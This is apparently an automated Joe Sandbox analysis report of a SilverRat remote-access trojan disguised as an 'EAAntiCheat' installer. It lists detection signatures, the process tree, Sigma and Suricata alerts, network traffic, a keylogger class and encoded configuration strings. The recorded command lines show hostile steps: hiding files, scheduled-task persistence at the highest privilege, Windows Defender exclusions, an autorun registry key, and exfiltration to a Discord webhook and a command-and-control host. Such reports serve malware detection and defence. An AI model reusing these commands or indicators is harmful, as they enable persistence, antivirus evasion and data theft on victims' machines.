Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Xyq6rvzLJs.exe

Overview

General Information

Sample name:Xyq6rvzLJs.exe
renamed because original name is a hash value
Original sample name:3aab068d8c443560d02e4b58cf05e8f1b6d70f93.exe
Analysis ID:1552937
MD5:5ec3267acfd4ef36cbfb796016142892
SHA1:3aab068d8c443560d02e4b58cf05e8f1b6d70f93
SHA256:64b1f050cbe98f8ecdc56cf7fb3a2a96fdeb3d5bad2053db36ba12a5fe5e92bb
Tags:exesilverratuser-NDA0E
Infos:

Detection

SilverRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected SilverRat
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Xyq6rvzLJs.exe (PID: 2764 cmdline: "C:\Users\user\Desktop\Xyq6rvzLJs.exe" MD5: 5EC3267ACFD4EF36CBFB796016142892)
    • attrib.exe (PID: 1436 cmdline: "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\EA" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 7092 cmdline: "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6360 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF224.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 4796 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • $77EAAntiCheat.Installler.exe (PID: 2884 cmdline: "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe" MD5: 5EC3267ACFD4EF36CBFB796016142892)
        • schtasks.exe (PID: 5564 cmdline: "schtasks.exe" /query /TN $77EAAntiCheat.Installler.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 2944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 4068 cmdline: "schtasks.exe" /Create /SC ONCE /TN "$77EAAntiCheat.Installler.exe" /TR "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe \"\$77EAAntiCheat.Installler.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 1776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 1096 cmdline: "schtasks.exe" /query /TN $77EAAntiCheat.Installler.exe MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7092 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 432 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • schtasks.exe (PID: 7060 cmdline: "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "EAAntiCheat.Installler_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00 MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • $77EAAntiCheat.Installler.exe (PID: 6104 cmdline: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe "\$77EAAntiCheat.Installler.exe" /AsAdmin MD5: 5EC3267ACFD4EF36CBFB796016142892)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Xyq6rvzLJs.exeJoeSecurity_SilverRatYara detected SilverRatJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeJoeSecurity_SilverRatYara detected SilverRatJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2077667438.0000000003F74000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SilverRatYara detected SilverRatJoe Security
        00000000.00000000.2051314011.0000000000622000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_SilverRatYara detected SilverRatJoe Security
          Process Memory Space: Xyq6rvzLJs.exe PID: 2764JoeSecurity_SilverRatYara detected SilverRatJoe Security
            SourceRuleDescriptionAuthorStrings
            0.0.Xyq6rvzLJs.exe.620000.0.unpackJoeSecurity_SilverRatYara detected SilverRatJoe Security
              0.2.Xyq6rvzLJs.exe.3f77ae8.0.unpackJoeSecurity_SilverRatYara detected SilverRatJoe Security
                0.2.Xyq6rvzLJs.exe.3f77ae8.0.raw.unpackJoeSecurity_SilverRatYara detected SilverRatJoe Security

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe" , ParentImage: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe, ParentProcessId: 2884, ParentProcessName: $77EAAntiCheat.Installler.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, ProcessId: 7092, ProcessName: powershell.exe
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Xyq6rvzLJs.exe, ProcessId: 2764, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\(Default)
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe" , ParentImage: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe, ParentProcessId: 2884, ParentProcessName: $77EAAntiCheat.Installler.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, ProcessId: 7092, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /Create /SC ONCE /TN "$77EAAntiCheat.Installler.exe" /TR "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe \"\$77EAAntiCheat.Installler.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST, CommandLine: "schtasks.exe" /Create /SC ONCE /TN "$77EAAntiCheat.Installler.exe" /TR "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe \"\$77EAAntiCheat.Installler.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST, CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe" , ParentImage: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe, ParentProcessId: 2884, ParentProcessName: $77EAAntiCheat.Installler.exe, ProcessCommandLine: "schtasks.exe" /Create /SC ONCE /TN "$77EAAntiCheat.Installler.exe" /TR "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe \"\$77EAAntiCheat.Installler.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST, ProcessId: 4068, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /Create /SC ONCE /TN "$77EAAntiCheat.Installler.exe" /TR "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe \"\$77EAAntiCheat.Installler.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST, CommandLine: "schtasks.exe" /Create /SC ONCE /TN "$77EAAntiCheat.Installler.exe" /TR "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe \"\$77EAAntiCheat.Installler.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST, CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe" , ParentImage: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe, ParentProcessId: 2884, ParentProcessName: $77EAAntiCheat.Installler.exe, ProcessCommandLine: "schtasks.exe" /Create /SC ONCE /TN "$77EAAntiCheat.Installler.exe" /TR "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe \"\$77EAAntiCheat.Installler.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST, ProcessId: 4068, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe" , ParentImage: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe, ParentProcessId: 2884, ParentProcessName: $77EAAntiCheat.Installler.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit, ProcessId: 7092, ProcessName: powershell.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-09T22:53:22.851817+010020229301A Network Trojan was detected20.109.210.53443192.168.2.549710TCP
                  2024-11-09T22:54:01.184035+010020229301A Network Trojan was detected20.109.210.53443192.168.2.549942TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Xyq6rvzLJs.exeAvira: detected
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeAvira: detection malicious, Label: HEUR/AGEN.1313050
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeReversingLabs: Detection: 63%
                  Source: Xyq6rvzLJs.exeReversingLabs: Detection: 63%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeJoe Sandbox ML: detected
                  Source: Xyq6rvzLJs.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77EAAntiCheat.Installler.exe.logJump to behavior
                  Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.5:49706 version: TLS 1.2
                  Source: Xyq6rvzLJs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

                  barindex
                  Source: global trafficTCP traffic: 141.98.102.187 ports 2,3,29853,5,8,9
                  Source: global trafficTCP traffic: 192.168.2.5:49707 -> 141.98.102.187:29853
                  Source: global trafficHTTP traffic detected: POST /api/webhooks/1096011178049802290/d9w9LhtbB8Cy4apceC6cLWfZWhlAAMAf3qABUNFcfpGyxXEk9Qtozf7gqlpK15fLwasp HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: discord.comContent-Length: 414Expect: 100-continueConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
                  Source: Joe Sandbox ViewASN Name: M247GB M247GB
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49710
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49942
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: discord.com
                  Source: global trafficDNS traffic detected: DNS query: kanibal.mooo.com
                  Source: unknownHTTP traffic detected: POST /api/webhooks/1096011178049802290/d9w9LhtbB8Cy4apceC6cLWfZWhlAAMAf3qABUNFcfpGyxXEk9Qtozf7gqlpK15fLwasp HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: discord.comContent-Length: 414Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 09 Nov 2024 21:53:10 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1731189192x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IUwVeMTn46AHZNgPU7jzSwB1ChURg%2FZ0LFBa8yr2cMhRL%2BgeeUIZxuG0i0PQUqzNy8ZKyhAeWIV43fbBNmoZdLl6LT1mOa5sEtwDPTTI%2BcwJrXZKL5K8l6cn%2FtdY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=abcf9f927ef405fe1dead6df440f9055f166ebbb-1731189190; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=78SoGGeM4_zTYGvCUSTwQVwmHc8KwTnr0hkI6fWjeOI-1731189190777-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e0108b949c62cc7-DFW{"message": "Unknown Webhook", "code": 10015}
                  Source: $77EAAntiCheat.Installler.exe, 0000000C.00000002.3298160192.000000000410B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
                  Source: Xyq6rvzLJs.exe, 00000000.00000002.2077667438.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp, $77EAAntiCheat.Installler.exe, 0000000C.00000002.3298160192.0000000003D29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: $77EAAntiCheat.Installler.exe, 0000000C.00000002.3298160192.000000000406E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                  Source: $77EAAntiCheat.Installler.exe, 00000017.00000002.2137877300.0000000003771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1096011178049802290/d9w9LhtbB8Cy4apceC6cLWfZWhlAAMAf3qABUNFcfpGyxXE
                  Source: $77EAAntiCheat.Installler.exe, 00000017.00000002.2137877300.0000000003771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.top4top.io/p_2522c7w8u
                  Source: $77EAAntiCheat.Installler.exe, 00000017.00000002.2137877300.0000000003771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.top4top.io/p_2522c7w8u1.png
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.5:49706 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: Xyq6rvzLJs.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.Xyq6rvzLJs.exe.620000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Xyq6rvzLJs.exe.3f77ae8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Xyq6rvzLJs.exe.3f77ae8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2077667438.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.2051314011.0000000000622000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Xyq6rvzLJs.exe PID: 2764, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exe, type: DROPPED
                  Source: Xyq6rvzLJs.exe, Keyloaggr.cs.Net Code: KeyboardLayout
                  Source: $77EAAntiCheat.Installler.exe.0.dr, Keyloaggr.cs.Net Code: KeyboardLayout
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeCode function: 0_2_00007FF848E97E09 NtSetValueKey,0_2_00007FF848E97E09
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeCode function: 0_2_00007FF848E960C20_2_00007FF848E960C2
                  Source: C:\Users\user\Desktop\Xyq6rvzLJs.exeCode function: 0_2_00007FF848E953160_2_00007FF848E95316
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeCode function: 12_2_00007FF848E760C212_2_00007FF848E760C2
                  Source: C:\Users\user\AppData\Roaming\EA\$77EAAntiCheat.Installler.exeCode function: 12_2_00007FF848E7531612_2_00007FF848E75316
                  Source: Xyq6rvzLJs.exeStatic PE information: No import functions for PE file found
                  Source: $77EAAntiCheat.Installler.exe.0.drStatic PE information: No import functions for PE file found
                  Source: Xyq6rvzLJs.exe, 00000000.00000000.2051327899.000000000062E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEAAntiCheat.Services.exe4 vs Xyq6rvzLJs.exe
                  Source: Xyq6rvzLJs.exe, 00000000.00000002.2077667438.0000000003F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEAAntiCheat.Services.exe4 vs Xyq6rvzLJs.exe
                  Source: Xyq6rvzLJs.exeBinary or memory string: OriginalFilenameEAAntiCheat.Services.exe4 vs Xyq6rvzLJs.exe
                  Source: Xyq6rvzLJs.exe, Settings.csCryptographic APIs: 'CreateDecryptor'
                  Source: $77EAAntiCheat.Installler.exe.0.dr, Settings.csCryptographic APIs: 'CreateDecryptor'
                  Source: Xyq6rvzLJs.exe, Settings.csTask registration methods: 'CreateShTasks'
                  Source: $77EAAntiCheat.Installler.exe.0.dr, Settings.csTask registration methods: 'CreateShTasks'
                  Source: Xyq6rvzLJs.exe, Settings.csBase64 encoded string: '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'
                  Source: Xyq6rvzLJs.exe, Installation.csBase64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBiLlp486XC9OZHtGsiixnNW'
                  Source: Xyq6rvzLJs.exe, MessageRead.csBase64 encoded string: 'YuiIb0bvpOW/HwRCrl07ZyLIxUPAoAy0/EE6+OB0IBhStm9RR7V2byuc2qvN4qWd'
